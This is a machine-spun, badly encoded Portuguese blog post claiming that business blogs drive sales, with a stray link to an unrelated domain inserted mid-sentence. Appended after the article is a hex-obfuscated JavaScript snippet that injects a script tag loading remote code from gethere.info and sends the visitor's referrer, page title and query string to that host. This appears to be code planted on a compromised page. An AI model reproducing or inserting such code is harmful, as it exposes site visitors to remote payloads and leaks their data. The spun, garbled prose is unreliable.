Blog

Blogues E Vendas: Uma Parceria De NegA?cio Natural ?

Como o visitante pode supor, uma de principais razA�es pelas quais as empresas consideram os blogs eficientes como ferramentas de negA?cios A� de que elas auxiliam a entregar ou promover as vendas. Embora nA?o haja 1 valor quantitativo com relaA�A?o A� influA?ncia monetA?ria exata dos blogs sobre as vendas, existe evidA?ncias por algum tipo de retorno sobre este investimento. Este aumento nas vendas tA?m a possibilidade de ser e geralmente A� um dos efeitos indiretos dos blogues de sucesso.

Blogs – bom para os negA?cios

Imagine sentar em frente ao seu computador com milhA�es do pessoas (acionistas, parceiros por negA?cios, concorrentes, funcionA?rios e a mA�dia) conversando a cerca de negA?cios e afins. Doravante imagine se vocA? tA?m a possibilidade de usar praticamente as informaA�A�es que o visitante aprendeu para estabelecer este produto ou serviA�o que seus clientes querem, por que eles querem, como eles querem e quanto eles estA?o dispostos a pagar assim sendo. Isto foi precisamente este que A� um blog e bastante mais. Definitivamente, os blogues sA?o bons para as empresas.

Um blogue ou 1 blog foi um sitio interativo que mantA�m uma crA?nica contA�nua de informaA�A�es. A� 1 site atualizado regularmente com links para outros artigos ou outros sites. Geralmente, um blog tende a ter uma A?rea do conteA?do principal com artigos chamados postagens ou entradas listadas em ordem cronolA?gica inversa com as mais recentes pelo topo. Geralmente, esses artigos sA?o organizados em categorias. HA? tambA�m igualmente similarmente identicamente conjuntamente um arquivo de artigos baseado em datas. Um blogroll, uma lista do links para outros sitios relacionados A� especialmente outra caracterA�stica de 1 blog.

Um blog pode reprimir um ou mais feeds. A maioria dos blogs publica feeds (RSS, RDF, Atom). Um feed A� um conteA?do legA�vel por mA?quina que foi atualizado periodicamente. Um leitor de feeds exibe a nova postagem e 1 link para ela. A maior parte dos blogues tambA�m tem um recurso que permite aos visitantes deixar comentA?rios. Com 1 blog, vocA? publica novos conteA?dos e seus leitores podem adicionar seus prA?prios comentA?rios com links para seus prA?prios blogs. Elementar de usar ferramentas do blogs estA?o disponA�veis, inumeras vezes de graA�a. Uma ferramenta bA?sica de blogging fornece uma interface onde o visitante pode trabalhar de forma fA?cil e intuitiva enquanto cuida do restante da logA�stica envolvida em tornar seu blogue apresentA?vel e disponA�vel para o pA?blico.

Blogar, criar ou manter um blog A� especialmente uma das A?reas do rA?pido aumento da Net. De pacto com o popular motor de busca Technorati, hA? mais do 40 milhA�es de blogues na Internet hoje em dia e mais blogues estA?o aparecendo na taxa de 75. 000 por dia. Isto A� especialmente principalmente por motivos de aos inA?meros benefA�cios de blogs para negA?cios.

Um blog tem uma poderosa capacidade de marketing para expandir seus negA?cios, seja ele pequeno ou grande. Agora vocA? tA?m a possibilidade de ter uma presenA�a dominador na Web, nA?o baseada em tamanho, capital ou recursos, contudo baseada na qualidade por conteA?do, pA?blico-alvo e suplementos alimentares e serviA�os A?teis. Com blogs como equalizadores, a blogosfera se tornou um campo por jogo verdadeiramente estimulante para todas as empresas.

Um blogue A� uma fonte repetida de informaA�A�es valiosas e atualizadas. A criaA�A?o por um blogue permite de que vocA? demonstre sua experiA?ncia e se estabeleA�a saiba como um lA�der de ideias em seu setor. Um blog pode ser seu veA�culo para atualizaA�A�es de suplementos alimentares ou serviA�os, notA�cias da empresa e qualquer outra informaA�A?o de que vocA? queira transmitir ao seu pA?blico-alvo. Um blog deve conter informaA�A�es relevantes, nA?o exclusivamente arremessos por vendas; caso contrA?rio, A� especialmente muito menos provA?vel que os leitores retornem. Como acontece com qualquer parte de um plano do marketing da empresa, um blog deve conter informaA�A�es que atraiam seu pA?blico-alvo.

Um blog A� 1 mA�todo eficaz para se comunicar usando clientes e prospects. Ele permite de que vocA? converse abertamente e regularmente usando eles, aumentando a credibilidade, criando confianA�a e formando relacionamentos usando eles desde o princA�pio. Um blogue com seu estilo de conversaA�A?o foi ideal para desenvolver bons relacionamentos com os clientes. Os leitores sentir-se-A?o desembaraA�ado consigo muito antes de telefonarem-lhe para fazer uma compra ou aproveitar o seu serviA�o.

Um blog A� uma A?tima ferramenta para obter feedback dos leitores. Seus leitores podem possibilitar deixar comentA?rios ou realizar perguntas. 1 blog A� uma A?tima maneira de descobrir o que estes leitores estA?o pensando e no desenvolvimento fornece idA�ias ou saiba como melhor atendA?-los, melhorando assim o seu negA?cio. Formar decisA�es por negA?cios usando base nos feedbacks destes leitores pode ser 1 dos movimentos mais inteligentes que o visitante pode criar.

No entanto, para ser eficaz, 1 blog tem que ser atualizado usando freqA?A?ncia. Estes leitores nA?o visitam blogs que nA?o apresentam novos conteA?dos regularmente. Manter os leitores informados com postagens periA?dicas a cerca de o seu negA?cio cria buzz e publicidade. Existe trabalho envolvido na criaA�A?o de um blog. Leva tempo e compromisso para escrever posts interessantes e informativos. PorA�m pode ser bem gasto, especialmente se ajudar a gerar vendas.

Blogues e Vendas Em Tandem

As vendas exigem interaA�A?o pessoal. Um blog A� 1 desses lugares onde a comunicaA�A?o atravA�s de conversas prospera e os relacionamentos sA?o fomentados. Quando vocA? dA? aos seus leitores informaA�A�es importantes que eles podem possibilitar usar atravA�s do seu blog de forma consistente, eles ficarA?o satisfeitos. Em seguida, eles retornarA?o para mais conteA?do recente regularmente. Horas extras, vocA? serA? capaz de obter um pA?blico fiel. Os leitores vA?o vA?-lo tais como um especialista em seu nicho especA�fico. Seus leitores vA?o confiar em vocA? e um relacionamento A� progredido. Seus leitores perceberA?o que A� menos arriscado adquirir de o visitante ou emanar seu serviA�o. Se vocA? pode blogar eficientemente sobre o assunto, eles tendem a confiar que seu produto ou serviA�o valerA? a penado.

Ao blogar, vocA? estA? enviando a recado de que alguA�m estA? ouvindo, alguA�m que vocA? tA?m a possibilidade de abordar tais como pode ser visto a partir do comentA?rios respondidos e novas atualizaA�A�es. Isso farA? usando que seus leitores se sintam mais seguros e levarA? isso em lado, pois eles tomam uma decisA?o do compra. O blog A� especialmente inerentemente uma conversa contA�nua que, a longo prazo, gera confianA�a e lealdade e gera familiaridade. Quando eles se tornarem clientes satisfeitos, eles virA?o atA� vocA? para obter muito mais informaA�A�es e, se receberem a opA�A?o, desejarA?o comprar de vocA?. Isso fortalece o relacionamento entre vocA? e seus clientes e eles tambA�m igualmente similarmente identicamente conjuntamente podem enviar outras vendas para o visitante. O ciclo continua. AlA�m disso, 1 blog A� especialmente uma maneira extremamente eficiente para adquirir um ranking elevado do Search Engine. Em outras palavras, os blogs podem trazer muito mais leitores e mais compradores em potencial.

Blogar foi marketing para as pessoas de uma forma menos intrusiva e ofensiva, mais saiba como uma conversa freewheeling em comparaA�A?o com um discurso de vendas irritante. A� realmente uma boa forma de jtcw.jp estimular as vendas, ainda de que indiretamente.

var _0xb322=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}